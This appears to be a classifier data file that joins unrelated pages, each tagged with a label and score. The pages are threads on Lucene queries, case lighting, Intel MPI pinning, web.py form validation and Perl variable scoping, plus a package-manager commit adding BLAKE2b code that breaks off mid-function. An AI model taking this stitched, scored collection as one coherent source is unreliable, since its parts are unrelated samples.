Sign up × Stack Overflow is a community of 4.7 million programmers, just like you, helping each other. Join them; it only takes a minute: I am using Lucene to allow a user to search for words in a large number of documents. Lucene seems to default to returning all documents containing any of the words entered. Is it possible to change this behaviour? I know that '+' can be use to force a term to be included but I would like to make that the default action. Ideally I would like functionality similar to Google's: '-' to exclude words and "abc xyz" to group words. Just to clarify I also thought of inserting '+' into all spaces in the query. I just wanted to avoid detecting grouped terms (brackets, quotes etc) and potentially breaking the query. Is there another approach? share|improve this question 5 Answers 5 up vote 22 down vote accepted This looks similar to the Lucene Sentence Search question. If you're interested, this is how I answered that question: String defaultField = ...; Analyzer analyzer = ...; QueryParser queryParser = new QueryParser(defaultField, analyzer); queryParser.setDefaultOperator(QueryParser.Operator.AND); Query query = queryParser.parse("Searching is fun"); share|improve this answer      +1, I have been looking for this and glad that I found it in SO – mohang Apr 11 '12 at 11:06 Why not just preparse the user search input and adjust it to fit your criteria using the Lucene query syntax before passing it on to Lucene. Alternatively, you could just create some help documentation on how to use the standard syntax to create a specific query and let the user decide how the query should be performed. share|improve this answer Lucene has a extensive query language as described here that describes everything you want except for + being the default but that's something you can simple handle by replacing spaces with +. So the only thing you need to do is define the format you want people to enter their search queries in (I would strongly advise to adhere to the default Lucene syntax) and then you can write the transformations from your own syntax to the Lucene syntax. share|improve this answer The behavior is hard-coded in method addClause(List, int, int, Query) of class org.apache.lucene.queryParser.QueryParser, so the only way to change the behavior (other than the workarounds above) is to change that method. The end of the method looks like this: if (required && !prohibited) clauses.addElement(new BooleanClause(q, BooleanClause.Occur.MUST)); else if (!required && !prohibited) clauses.addElement(new BooleanClause(q, BooleanClause.Occur.SHOULD)); else if (!required && prohibited) clauses.addElement(new BooleanClause(q, BooleanClause.Occur.MUST_NOT)); else throw new RuntimeException("Clause cannot be both required and prohibited"); Changing "SHOULD" to "MUST" should make clauses (e.g. words) required by default. share|improve this answer Like Adam said, there's no need to do anything to the query string. QueryParser's setDefaultOperator does exactly what you're asking for. share|improve this answer Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.725226
Lighting up the inside of a case - RGB? Discussion in 'Die-hard Overclocking & Case Modifications' started by Shakey_Jake33, Jan 13, 2020. 1. Shakey_Jake33 Shakey_Jake33 Master Guru Messages: 246 Likes Received: 16 GPU: RTX 2060 2010/2675 This is a very newbie question - I've never really messed with RGB because I fundimentally dislike adding unnecessary cables and having to use extra software, as well as finding RGB to look a bit tacky. However, there's a specific thing I want to achieve. Basically, I'm thinking about lighting up the inside of my case with white light. My graphics card already has this and lights up the bottom half really well by itself, but the upper half has been pitch black since I replaced the AMD stock cooler. I'm thinking that if I can get some subtle white light inside the case, pair it with a white MicroATX case, it'll look pretty classy with the black motherboard. What would be the best way to do this? I was thinking about going the RGB route using white 120mm fans, but would this actually light things up too much? I'm not looking for crazy pattern effects, and would rather not have an extra RGB controller and software is it can be avoided. Would LED fans be a good solution? LED strips? I'm open to any ideas! My end goal is a pure white MicroATX case with a window, the internals lit with with a white light that generally looks classy and stylish rather than 'gamer RGB'. Thanks!   insp1re2600 likes this. 2. insp1re2600 insp1re2600 Maha Guru Messages: 1,083 Likes Received: 393 GPU: RTX 2080TI OC H20 3. Shakey_Jake33 Shakey_Jake33 Master Guru Messages: 246 Likes Received: 16 GPU: RTX 2060 2010/2675 Thanks! That looks like a good solution if it can be done discretely. Might pay extra for the Coolermaster one since it looks like the light will be spread more consistently.   Share This Page
__label__pos
0.522176
Intel® oneAPI HPC Toolkit Get help with building, analyzing, optimizing, and scaling high-performance computing (HPC) applications. Announcements This community is designed for sharing of public information. Please do not share Intel or third-party confidential information here. 1917 Discussions How to pin Intel MPI processes within Torque cpusets? Set domain issues shamov_um Beginner 242 Views Hi, I think I have a problem with process pinning, for older version of Intel MPI (4.0.1). The version cannot be changed because it is bundled with the user's application ( Accelrys Material Studio) and there are tons of scripts surrounding it. The code works when started interactively, but when run under the Torque batch system, there are following messages: [6] MPI startup(): set domain {10,11} fails on node XXX.local [5] MPI startup(): set domain {9} fails on node XXX.local [7] MPI startup(): set domain {10,11} fails on node XXX.local [4] MPI startup(): set domain {9} fails on node XXX.local The code then fails when is run accross the nodes, or runs slow within a single node. I can run the same code, same data interactibvely accross the nodes, and I dont see teh "set domain" messages. Our site uses Torque cpusets. So I suspect the difference between running interactively or from a batch script is the cpusets and pinning of the processes. First question: am I correct? What do these "set domain fails" messages really mean?). Torque gives the list of CPU cores allocated for the job in its cpuset: /dev/cpuset/torque/JOB_ID/cpus will contain something like "8-11" or "0-7". I have tried to pass it to Intel MPI as follows: range=`cat /dev/cpuset/torque/$PBS_JOBID/cpus` export I_MPI_PIN=enable export I_MPI_PIN_PROCS=$range [... RunMatServer.sh starts ...] It seems to pin cores to something. And I dont get the "set domain" messages anymore. The second question is, is that a right/correct way to interface Torque cpusets to IntelMPI jobs? -- Grigory Shamov University of Manitoba / Westgrid 0 Kudos 3 Replies shamov_um Beginner 242 Views Update: either with pinning, or with I_MPI_PIN=disable, there is the same problem: a job that succesfully runs interactively on two nodes, fails when run under Torque, on the very same nodes, with following error message: Fatal error in PMPI_Bcast: Message truncated, error stack: PMPI_Bcast(1920)..................: MPI_Bcast(buf=0x7fff86db0ac0, count=1, MPI_LONG, root=0, MPI_COMM_WORLD) failed MPIR_Bcast(1236)..................: MPIR_Bcast_Shum_ring(1039)........: MPIDI_CH3U_Receive_data_found(129): Message from rank 3 and tag 2 truncated; 532 bytes received but buffer size is 8 [1:n008] unexpected disconnect completion event from [4:n189] Assertion failed in file ../../dapl_module_util.c at line 2682: 0 ~ I'm at loss as to what might cause the difference.. -- Grigory Shamov James_T_Intel Moderator 242 Views Hi Grigory, There is currently an incompatibility between the Intel® MPI Library and cpuset. We have some possible workarounds, but they are intended for current versions, and I don't know if they will work on earlier versions. Are you using Hydra or MPD as your process manager? If you are using Hydra, try setting HYDRA_BINDLIB=none and see if that helps. You could also try to fully subscribe each node, which might help avoid the problem. If you can disable cpuset, that should also help. If the ISV software dynamically links to the Intel® MPI Library, you might be able to use the current version. If you install the runtime version (go to http://www.intel.com/go/mpi and select the Runtime for Linux* link on the right), you should be able to link to the current version instead of the older version. This will likely not help in this situation, as the cpuset incompatibility is still present, but when a fix is implemented and release, you should be able to use it. Sincerely, James Tullos Technical Consulting Engineer Intel® Cluster Tools shamov_um Beginner 242 Views Dear James, Thank you for the reply! I've tried requesting whole nodes, and setting the HYDRA_BINDLIB=none. For the shm:dapl fabrics it made a change that the job doesnt fail immediately , but rather freezes (the processes are there but no output is produced). I'm not sure it is CPUsets or something else here.. -- Grigory Shamov Reply
__label__pos
0.524475
Take the 2-minute tour × Stack Overflow is a question and answer site for professional and enthusiast programmers. It's 100% free, no registration required. I am using web.py framework for designing a small web application, presently i have created a login page and code is below index.py import web from web import form from web.contrib.auth import DBAuth import MySQLdb as mdb render = web.template.render('templates/') urls = ( '/', 'Login', '/projects', 'Projects', '/logout', 'Logout', ) app = web.application(urls, globals()) # Creating an instance(object) app which is the mediator between our classes and the web.It will handle browser requests and serve your pages web.config.debug = False db = web.database(dbn='mysql', db='Python_Web', user='root', pw='redhat') settings = {} if web.config.get('_session') is None: session = web.session.Session(app,web.session.DiskStore('sessions'),initializer={'user':'anonymous','loggedin':False}) web.config._session = session else: session = web.config._session auth = DBAuth(app, db, session,**settings) def logged(): if session['loggedin'] == 1: return True else: return False class Login: # field validators username_required = form.Validator("Username not provided", bool) password_required = form.Validator("Password not provided", bool) # form validators login_details_required = form.Validator("Please Enter Login Details", lambda f: f["username"] or f["password"]) login_form = form.Form( form.Textbox('username', username_required), form.Password('password',password_required,description="Password"), form.Button('Login'), ) def GET(self): if logged(): raise web.seeother('/projects') else: form = self.login_form() return render.login(form) def POST(self): if not my_form.validates(dict(username="", password="small")): return render.login(form) i = web.input() username = i.username.strip() password = i.password.strip() user = auth.authenticate(username, password) if not user: session.loggedin = False return render.login_error(form) else: auth.login(user) session.loggedin = True session.user = i.username.strip() raise web.seeother('/projects') if __name__ == "__main__": web.internalerror = web.debugerror app.run() Here in the above code my intention is 1.If username not provided it should display "Username not provided" when clicked on Login 2.If password not provided it should display "password not provided" when clicked on Login 3.If password provided but length is less than 7 characters it should display "Password length should be minimum 7 characters" when clicked on Login(Of course this validation concept suits when creating a user by selecting password ) 4.If Both not provided it should display "Please Enter Login Details" when clicked on Login 5.If Login details not matched it should display "Invalid Username or Password" when clicked on Login and if login Details matched should redirect to next page In the above code when login details matched its redirecting to next page successfully and if not displaying Invalid username or password through return render.login_error(form) (I copied same html code from login(form) page to login_error(form) and added "Invalid Username or Password" line extra in that) Also i created a regex expression for password validation and hope thats working(I dint checked exactly) because if password length is less than 7 characters it is not redirecting to next page instead redirecting to same login page, but at the same time i want to display on the browser like the message "Password length should be minimum 7 characters" which i am unable to do(dont know how to do) Also i had given username as form.notnull() validation in Form creation as above, when i tried to click login it is checking whether the form validates or not and if not redirecting to the same login page, but i want to display the message "Please enter the username" and also for password if not provided 1. Whether the above regex will work correctly (i dint worked on regex until now) 2. How to display the above validation messages on browser if username,password, not provided on the browser, because i had created another html page just for the Invalid username or password message to appear on the browser when details are incorrect Whether we can do all this validations in single html file(like login.html) itself ? , i have tried a lot but i am unable catch the process going on here, if so we can save of creating more than one html for individual messages can anyone let me know on how to solve the above common problems ? Don't mind for my queries as this is my first step in web applications and i dint worked on web applications before share|improve this question add comment 1 Answer 1 up vote 1 down vote accepted You can add many validators to the same input field and there are also form level validations. from web import form # field validators username_required = form.Validator("Username not provided", bool) password_required = form.Validator("Password not provided", bool) password_length = form.Validator("Password length should be minimum 7 characters", lambda p: p is None or len(p) >= 7) # form validators login_details_required = form.Validator("Please Enter Login Details", lambda f: f["username"] or f["password"]) def check_login(f): # check for login here return False valid_credentials = form.Validator("Invalid username or password", check_login) login_form = form.Form( form.Textbox('username', username_required), form.Password('password', password_required, password_length, description="Password"), form.Button('Login'), validators=[login_details_required, valid_credentials], ) my_form = login_form() if not my_form.validates(dict(username="", password="small")): print my_form.render_css() if not my_form.validates(dict(username="notnull", password="just-enough")): print my_form.render_css() Note that login_details_required won't be triggered, because form-level validation is only triggered when all fields validators have passed. share|improve this answer      K i have edited code and as of now i want to check only two conditions, username and password that is if username not given or password not given,a message should display on the browser like"Please enter Username" and "Please enter Password", But when i run the code and checked by clicking login button with username and and without password, but its not displaying the message "please enter the password" on the browser. –  shiva krishna Oct 17 '12 at 5:28      Whether we need to design these messages in login.html(render.login(form)) to display on the browser? or whether there is any wrong in my above code? whether we need to check this in get method or post method ? –  shiva krishna Oct 17 '12 at 5:30      If u don't mind can u please add or correct this functionality code in my complete code pasted above as this is first web designing application and will design myself from the next time.... –  shiva krishna Oct 17 '12 at 5:30      There is a working example of form on webpy website, check this: webpy.org/cookbook/forms –  Andrey Kuzmin Oct 17 '12 at 11:49      yup.. i got the point where its not working. Actually after creating a login_form in the above code i am sending in to render.login(login_form), but i am not rendering it in html page like $:login_form.render,i created separate html for login page in index.html for username,password,login button.But actually i don't want to render it, i want to create my own html and functionality should work,is it possible to validate and display these messages on the browser with rendering $:form.render() in index.html ? –  shiva krishna Oct 18 '12 at 12:27 show 2 more comments Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.646699
Beefy Boxes and Bandwidth Generously Provided by pair Networks Pathologically Eclectic Rubbish Lister   PerlMonks   Our, use vars, and magic, oh my! by OzzyOsbourne (Chaplain) on Aug 23, 2001 at 16:58 UTC ( #107303=perlquestion: print w/replies, xml ) Need Help?? OzzyOsbourne has asked for the wisdom of the Perl Monks concerning the following question: I looked at the docs, looked at some threads, delved into the CB, and consulted the magic 8 ball, but I still can't seem to get my head around the answer to: What is the difference between my, use vars, and our? Most answers seemed vague, or I just didn't understand. The most worrysome answer was "Outlook not so good" from the magic 8-ball. I'm an NT admin. I know about Outlook not so good. Tell me about Perl scope, 8-ball. Perl scope! What I think I know: • my declares variables in lexical scope. Yup, got it. • use vars allows you to declare global variables, and refer to $package::$foo as $foo. Right on. • and our is the same as use vars but with lexical scope. A globally lexically thingy. OK. So on line 4 or 5, before any blocks, I declare my $foo. It acts with a lexical scope of the entire script. It acts sort of like a global variable. What if I put our $foo in the same place. Do I get the same effect? What if I put use vars $foo? My questions: 1. Is there any difference between declaring variables at the beginning of scripts with my or our? Won't their scope be the same? 2. Is there a reason to use one or the other in this situation See this example. Look at %TOC. Should it be my or our? Thanks for your help. -OzzyOsbourne Replies are listed 'Best First'. Re: Our, use vars, and magic, oh my! by dragonchild (Archbishop) on Aug 23, 2001 at 17:34 UTC In a one-file script, there is no difference between my, our, and use vars, when declaring a variable outside any given block. However, the difference comes in when working with functions or multi-file applications. • my says that this variable cannot be used outside its scope. When this scope goes away, this variable is killed. • our says that this variable cannot be used outside its scope. When this scope goes away, this variable stays around. • use vars says that this variable gets to ignore strict. It has no scope (other than the whole program). A good code example would be the following: sub foo { my $x; $x++; return $x; } print foo() for (0 .. 10); Try that, then change my to our. You'll see what I mean. ------ /me wants to be the brightest bulb in the chandelier! Vote paco for President! Re: Our, use vars, and magic, oh my! by chipmunk (Parson) on Aug 23, 2001 at 21:20 UTC There are basically two kinds of variables in Perl. • Package variables live in the symbol table, and are accessible from anywhere in the program. (In some cases the access requires using a package qualifier.) • Lexical variables do not live in the symbol table, and are accessible only from within the lexical scope where they are declared. However, there are three ways to declare a variable (in the latest version of Perl). • use vars qw/ $var /; declares $var as a variable in the current package. Within that package, you can write $var to get that variable. From anywhere, you can write $Pkg::var. • my $var; declares $var as a variable in the current lexical scope. Within that scope, you can write $var to get that variable. That's the only way you can access it, and the only place in the code you can access it. • our $var; declares $var as a variable in the current package, and sets up $var as an alias to that variable within the current lexical scope. Within that scope, you can write $var to get that variable. From anywhere, you can write $Pkg::var. Of course, this will be much easier to understand with some examples. An excellent explanation, but if you look at the example that I provided, what is the answer to question 1? The only post that seems to answer the question is dga's. Is my and our the same in my example? -OzzyOsbourne This is, in many ways, a followup to chipmunk's excellent post, but with a slight twist in that I do not consider our() or 'use vars' as ways of declaring global variables (there is a subtle but important distinction to be made). OzzyOsbourne asks: 1.Is there any difference between declaring variables at the beginning of scripts with my or our? Won't their scope be the same? Yes, there is a difference, and the difference is that No, the scopes of the *variables* will not be the same --- one will be a lexical variable (my) and the other will be a package-global variable (our). I think one major problem people have with my(), our(), and 'use vars' is that we all tend to discuss them as ways of declaring 'variables', and then confusion sets in because the scope of what we declared doesn't always coincide with the scope of the variable which doesn't seem to make sense. Do not think of our() and 'use vars' as ways of declaring *variables* and things become clearer. Lexical variables *are* declared and created with the my() declaration. Package variables are never really "declared" at all ... what is really being declared with either 'use vars' or our() is not the variable per se, but "unqualified access" to a package variable under the 'strict' pragma. You seem to be looking for an answer that says, "You absolutely should use my..." or "You absolutely should use our..." to declare variables at the top of the script. Well, there really isn't a definite answer like that. It partly depends on how you're using the variables, and partly on personal preference. If you are only using the variables from within that file, then you can declare with my. But you can still declare with use vars or our as well. It's really up to you. The script you're asking about should work the same whichever way you declare %TOC. If you are accessing the variables from another file, then you have to declare with use vars or our. They are mostly the same when used at the top of the file, but our has the unusual behavior of crossing package boundaries. Personally, I still do most of my coding for perl5.005, so I don't use our. I generally use my, except when I'm declaring packing variables or working with mod_perl. Re: Our, use vars, and magic, oh my! by mandog (Curate) on Aug 23, 2001 at 17:10 UTC Yes, but I still don't understand the initial declaration in his final example... -OzzyOsbourne Re: Our, use vars, and magic, oh my! by arhuman (Vicar) on Aug 23, 2001 at 17:58 UTC The only thing that bothers me is that we have at the same time : • 'use vars' and 'our' are equivalent in the sense that they make a variable reachable from outside of the package. • 'our' make a variable lexically scoped. I have no problem with the first point (I've checked it several times). But I thought that lexically scoped vars couldn't be accessed from the outside beccause they weren't in the package's namespace (but were in a 'scratchpad'). Did I wrongly assume that 'lexically scoped' implied the use of a 'scratchpad' (was it rather 'my var' implies use of scratchpad) or does it mean that despite being lexically scoped a 'our' variable is also 'exported' in the namespace ? Anyone to clear this point ? "Only Bad Coders Code Badly In Perl" (OBC2BIP) The fact that a variable is lexically scoped doesn't imply anything about the internal implementation. Lexical scoping is more a matter of syntax than anything else. According to the man page perlfunc:our or perldoc -f our, you can see that what the package Foo; our $foo; declaration does is get the interpreter to see occurrences of $foo unadorned, as it were, as occurrences of $Foo::foo, so it's a plain ol' package global: An "our" declaration declares a global variable that will be visible across its entire lexical scope, even across package boundaries. The package in which the variable is entered is determined at the point of the declaration, not at the point of use. HTH perl -e 'print "How sweet does a rose smell? "; chomp ($n = <STDIN>); +$rose = "smells sweet to degree $n"; *other_name = *rose; print "$oth +er_name\n"' Re: Our, use vars, and magic, oh my! by dga (Hermit) on Aug 23, 2001 at 19:32 UTC Update: can't believe I missed an important point. This is only if these are declared in a seperate block. D'oh. my $x; if($test) { my $z; func(); } sub func { #cant see $z #can see $x since the sub is in the same scope as $x } Mea Culpa. 1.Is there any difference between declaring variables at the beginning of scripts with my or our? Won't their scope be the same? 2.Is there a reason to use one or the other in this situation 1. The scope is the same. our variables cannot be used outside the current file (unless they are declared in the other file of course). In the file there is an important difference though. our variables can be seen in subroutines and my variables declared at the top of your script cannot be seen inside your subroutines. You must pass them in. 2. If you don't want your subs to see the variables without being passed in ( ie as global ) then you should use my. our variables can be seen in subroutines and my variables declared at the top of your script cannot be seen inside your subroutines. This is only true if you put your subroutines above the top of the script, i.e. above the my declarations. Some code - where $var can be accessed in the subroutine: use strict; my $var = 4; sub foo { $var = 'bar'; } foo; print $var; -- Hofmator Log In? Username: Password: What's my password? Create A New User Node Status? node history Node Type: perlquestion [id://107303] Approved by root help Chatterbox? and the sunlight beams... How do I use this? | Other CB clients Other Users? Others cooling their heels in the Monastery: (4) As of 2017-03-25 08:40 GMT Sections? Information? Find Nodes? Leftovers? Voting Booth? Should Pluto Get Its Planethood Back? Results (311 votes). Check out past polls.
__label__pos
0.51762
package simple and robust package manager Log | Files | Refs | README commit cb72f0ce1211844241aeb99eae7ba529d06c3a91 parent 6473a11e4fb8b5b09ac31048a4336b90ddfad3d2 Author: Josuah Demangeon <[email protected]> Date: Mon, 21 Jan 2019 23:51:00 +0100 initial import of blake2b Diffstat: MMakefile | 4+++- Abin/package-del | 26++++++++++++++++++++++++++ Ablake2b.c | 385+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Ablake2b.h | 65+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Mlog.c | 12++++-------- Mmem.c | 6++++++ Mmem.h | 1+ Mpackage-add.c | 12++++-------- Mpackage-install.c | 3+-- Mpackage-tree.c | 6++---- Mpackage.c | 44+++++++++++++++++--------------------------- Mpackage.h | 2-- Auint32.c | 39+++++++++++++++++++++++++++++++++++++++ Auint32.h | 14++++++++++++++ Muint64.c | 54++++++++++++++++++++++++------------------------------ Muint64.h | 11+++++++---- 16 files changed, 598 insertions(+), 86 deletions(-) diff --git a/Makefile b/Makefile @@ -1,5 +1,5 @@ bin = package-build package-dep package-get package-tree package-add package-install -obj = package.o buffer.o fmt.o stat.o hier.o log.o mem.o str.o stralloc.o forkexec.o tai.o tain.o +obj = package.o buffer.o fmt.o stat.o hier.o log.o mem.o str.o stralloc.o forkexec.o tai.o tain.o blake2b.o uint64.o uint32.o .PHONY: all all: ${bin} @@ -35,6 +35,7 @@ package-install: package-install.o ${obj} .c.o: ./make-o $< +blake2b.o: blake2b.c blake2b.h mem.h uint32.h uint64.h buffer.o: buffer.c buffer.h mem.h stralloc.h fmt.o: fmt.c fmt.h str.h forkexec.o: forkexec.c open.h forkexec.h @@ -53,4 +54,5 @@ str.o: str.c str.h stralloc.o: stralloc.c mem.h fmt.h str.h stralloc.h tai.o: tai.c tai.h tain.o: tain.c tain.h uint64.h fmt.h +uint32.o: uint32.c uint32.h uint64.o: uint64.c uint64.h diff --git a/bin/package-del b/bin/package-del @@ -0,0 +1,26 @@ +#!/bin/sh -e + +PACKAGE_DIR=/package +PACKAGE_ROOT=/ + +usage() { + printf '%s [-p pkgdir] package/version\n' "$0" + exit 1 +} + +while [ "$#" -gt 0 ]; do + case "$1" in + (-p) shift; PACKAGE_DIR=$1 ;; + (-r) shift; PACKAGE_ROOT=$1 ;; + (-*) usage ;; + (*) break ;; + esac + shift +done + +[ "$#" -eq 1 ] || usage +case "$1" in (*/*) ;; (*) usage ;; esac + +rm "$PACKAGE_DIR/$1/current" + +find -L "$PACKAGE_ROOT/bin" -type l -exec rm {} + diff --git a/blake2b.c b/blake2b.c @@ -0,0 +1,385 @@ +/* + * BLAKE2 reference source code package - C implementations + * + * Written in 2012 by Samuel Neves <[email protected]> + * Changed in 2019 by Josuah Demangeon <[email protected]> + * + * To the extent possible under law, the author(s) have dedicated all copyright + * and related and neighboring rights to this software to the public domain + * worldwide. This software is distributed without any warranty. + * + * You should have received a copy of the CC0 Public Domain Dedication along + * with + * this software. If not, see + * <http://creativecommons.org/publicdomain/zero/1.0/>. + */ + +#include <assert.h> + +#include "blake2b.h" +#include "mem.h" +#include "uint32.h" +#include "uint64.h" + +#define COMPILER_ASSERT(X) (void) sizeof(char[(X) ? 1 : -1]) + +static const uint64_t blake2b_IV[8] = { + 0x6a09e667f3bcc908ULL, 0xbb67ae8584caa73bULL, 0x3c6ef372fe94f82bULL, + 0xa54ff53a5f1d36f1ULL, 0x510e527fade682d1ULL, 0x9b05688c2b3e6c1fULL, + 0x1f83d9abfb41bd6bULL, 0x5be0cd19137e2179ULL +}; + +static const uint8_t blake2b_sigma[12][16] = { + { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 }, + { 14, 10, 4, 8, 9, 15, 13, 6, 1, 12, 0, 2, 11, 7, 5, 3 }, + { 11, 8, 12, 0, 5, 2, 15, 13, 10, 14, 3, 6, 7, 1, 9, 4 }, + { 7, 9, 3, 1, 13, 12, 11, 14, 2, 6, 5, 10, 4, 0, 15, 8 }, + { 9, 0, 5, 7, 2, 4, 10, 15, 14, 1, 11, 12, 6, 8, 3, 13 }, + { 2, 12, 6, 10, 0, 11, 8, 3, 4, 13, 7, 5, 15, 14, 1, 9 }, + { 12, 5, 1, 15, 14, 13, 4, 10, 0, 7, 6, 3, 9, 2, 8, 11 }, + { 13, 11, 7, 14, 12, 1, 3, 9, 5, 0, 15, 4, 8, 6, 2, 10 }, + { 6, 15, 14, 9, 11, 3, 0, 8, 12, 2, 13, 7, 1, 4, 10, 5 }, + { 10, 2, 8, 4, 7, 6, 1, 5, 15, 11, 9, 14, 3, 12, 13, 0 }, + { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 }, + { 14, 10, 4, 8, 9, 15, 13, 6, 1, 12, 0, 2, 11, 7, 5, 3 } +}; + +static inline int +blake2b_set_lastnode(blake2b_state *S) +{ + S->f[1] = -1; + return 0; +} + +static inline int +blake2b_is_lastblock(const blake2b_state *S) +{ + return S->f[0] != 0; +} + +static inline int +blake2b_set_lastblock(blake2b_state *S) +{ + if (S->last_node) + blake2b_set_lastnode(S); + S->f[0] = -1; + return 0; +} + +static inline int +blake2b_increment_counter(blake2b_state *S, const uint64_t inc) +{ + S->t[0] += inc; + S->t[1] += (S->t[0] < inc); + return 0; +} + +/* Parameter-related functions */ +static inline int +blake2b_param_set_salt(blake2b_param *P, const uint8_t salt[BLAKE2B_SALTBYTES]) +{ + mem_copy(P->salt, salt, BLAKE2B_SALTBYTES); + return 0; +} + +static inline int +blake2b_param_set_personal(blake2b_param *P, const uint8_t personal[BLAKE2B_PERSONALBYTES]) +{ + mem_copy(P->personal, personal, BLAKE2B_PERSONALBYTES); + return 0; +} + +static inline int +blake2b_init0(blake2b_state *S) +{ + int i; + + for (i = 0; i < 8; i++) { + S->h[i] = blake2b_IV[i]; + } + /* zero everything between .t and .last_node */ + mem_zero((void *) &S->t, + offsetof(blake2b_state, last_node) + sizeof(S->last_node) + - offsetof(blake2b_state, t)); + return 0; +} + +/* init xors IV with input parameter block */ +int +blake2b_init_param(blake2b_state *S, const blake2b_param *P) +{ + size_t i; + const uint8_t *p; + + COMPILER_ASSERT(sizeof *P == 64); + blake2b_init0(S); + p = (const uint8_t *) (P); + + /* IV XOR ParamBlock */ + for (i = 0; i < 8; i++) + S->h[i] ^= uint64_unpack_le(p + sizeof(S->h[i]) * i); + return 0; +} + +int +blake2b_init(blake2b_state *S, const uint8_t outlen) +{ + blake2b_param P[1]; + + P->digest_length = outlen; + P->key_length = 0; + P->fanout = 1; + P->depth = 1; + uint32_pack_le(P->leaf_length, 0); + uint64_pack_le(P->node_offset, 0); + P->node_depth = 0; + P->inner_length = 0; + mem_zero(P->reserved, sizeof(P->reserved)); + mem_zero(P->salt, sizeof(P->salt)); + mem_zero(P->personal, sizeof(P->personal)); + return blake2b_init_param(S, P); +} + +int +blake2b_init_salt_personal(blake2b_state *S, const uint8_t outlen, const void *salt, const void *personal) +{ + blake2b_param P[1]; + + P->digest_length = outlen; + P->key_length = 0; + P->fanout = 1; + P->depth = 1; + uint32_pack_le(P->leaf_length, 0); + uint64_pack_le(P->node_offset, 0); + P->node_depth = 0; + P->inner_length = 0; + mem_zero(P->reserved, sizeof(P->reserved)); + + if (salt != NULL) + blake2b_param_set_salt(P, (const uint8_t *) salt); + else + mem_zero(P->salt, sizeof(P->salt)); + + if (personal != NULL) + blake2b_param_set_personal(P, (const uint8_t *) personal); + else + mem_zero(P->personal, sizeof(P->personal)); + + return blake2b_init_param(S, P); +} + +int +blake2b_init_key(blake2b_state *S, const uint8_t outlen, const void *key, const uint8_t keylen) +{ + blake2b_param P[1]; + + P->digest_length = outlen; + P->key_length = keylen; + P->fanout = 1; + P->depth = 1; + uint32_pack_le(P->leaf_length, 0); + uint64_pack_le(P->node_offset, 0); + P->node_depth = 0; + P->inner_length = 0; + mem_zero(P->reserved, sizeof(P->reserved)); + mem_zero(P->salt, sizeof(P->salt)); + mem_zero(P->personal, sizeof(P->personal)); + + { + uint8_t block[BLAKE2B_BLOCKBYTES]; + mem_zero(block, BLAKE2B_BLOCKBYTES); + mem_copy(block, key, keylen); /* key and keylen cannot be 0 */ + blake2b_update(S, block, BLAKE2B_BLOCKBYTES); + mem_zero(block, BLAKE2B_BLOCKBYTES); /* Burn the key from stack */ + } + return 0; +} + +int +blake2b_init_key_salt_personal(blake2b_state *S, const uint8_t outlen, const void *key, const uint8_t keylen, const void *salt, const void *personal) +{ + blake2b_param P[1]; + + P->digest_length = outlen; + P->key_length = keylen; + P->fanout = 1; + P->depth = 1; + uint32_pack_le(P->leaf_length, 0); + uint64_pack_le(P->node_offset, 0); + P->node_depth = 0; + P->inner_length = 0; + mem_zero(P->reserved, sizeof(P->reserved)); + + if (salt != NULL) + blake2b_param_set_salt(P, (const uint8_t *) salt); + else + mem_zero(P->salt, sizeof(P->salt)); + + if (personal != NULL) + blake2b_param_set_personal(P, (const uint8_t *) personal); + else + mem_zero(P->personal, sizeof(P->personal)); + + { + uint8_t block[BLAKE2B_BLOCKBYTES]; + mem_zero(block, BLAKE2B_BLOCKBYTES); + mem_copy(block, key, keylen); /* key and keylen cannot be 0 */ + blake2b_update(S, block, BLAKE2B_BLOCKBYTES); + mem_zero(block, BLAKE2B_BLOCKBYTES); /* Burn the key from stack */ + } + return 0; +} + +/* inlen now in bytes */ +int +blake2b_update(blake2b_state *S, const uint8_t *in, uint64_t inlen) +{ + while (inlen > 0) { + size_t left = S->buflen; + size_t fill = 2 * BLAKE2B_BLOCKBYTES - left; + + if (inlen > fill) { + mem_copy(S->buf + left, in, fill); /* Fill buffer */ + S->buflen += fill; + blake2b_increment_counter(S, BLAKE2B_BLOCKBYTES); + blake2b_compress(S, S->buf); /* Compress */ + mem_copy(S->buf, S->buf + BLAKE2B_BLOCKBYTES, + BLAKE2B_BLOCKBYTES); /* Shift buffer left */ + S->buflen -= BLAKE2B_BLOCKBYTES; + in += fill; + inlen -= fill; + } else { + mem_copy(S->buf + left, in, inlen); + S->buflen += inlen; /* Be lazy, do not compress */ + in += inlen; + inlen -= inlen; + } + } + + return 0; +} + +int +blake2b_final(blake2b_state *S, uint8_t *out, uint8_t outlen) +{ + unsigned char buffer[BLAKE2B_OUTBYTES]; + + if (blake2b_is_lastblock(S)) + return -1; + + if (S->buflen > BLAKE2B_BLOCKBYTES) { + blake2b_increment_counter(S, BLAKE2B_BLOCKBYTES); + blake2b_compress(S, S->buf); + S->buflen -= BLAKE2B_BLOCKBYTES; + assert(S->buflen <= BLAKE2B_BLOCKBYTES); + mem_copy(S->buf, S->buf + BLAKE2B_BLOCKBYTES, S->buflen); + } + + blake2b_increment_counter(S, S->buflen); + blake2b_set_lastblock(S); + mem_zero(S->buf + S->buflen, 2 * BLAKE2B_BLOCKBYTES - S->buflen); /* Padding */ + blake2b_compress(S, S->buf); + + COMPILER_ASSERT(sizeof buffer == 64U); + uint64_pack_le(buffer + 8 * 0, S->h[0]); + uint64_pack_le(buffer + 8 * 1, S->h[1]); + uint64_pack_le(buffer + 8 * 2, S->h[2]); + uint64_pack_le(buffer + 8 * 3, S->h[3]); + uint64_pack_le(buffer + 8 * 4, S->h[4]); + uint64_pack_le(buffer + 8 * 5, S->h[5]); + uint64_pack_le(buffer + 8 * 6, S->h[6]); + uint64_pack_le(buffer + 8 * 7, S->h[7]); + mem_copy(out, buffer, outlen); /* outlen <= BLAKE2B_OUTBYTES (64) */ + + mem_zero(S->h, sizeof S->h); + mem_zero(S->buf, sizeof S->buf); + + return 0; +} + +/* inlen, at least, should be uint64_t. Others can be size_t. */ +int +blake2b(uint8_t *out, const void *in, const void *key, const uint8_t outlen, const uint64_t inlen, uint8_t 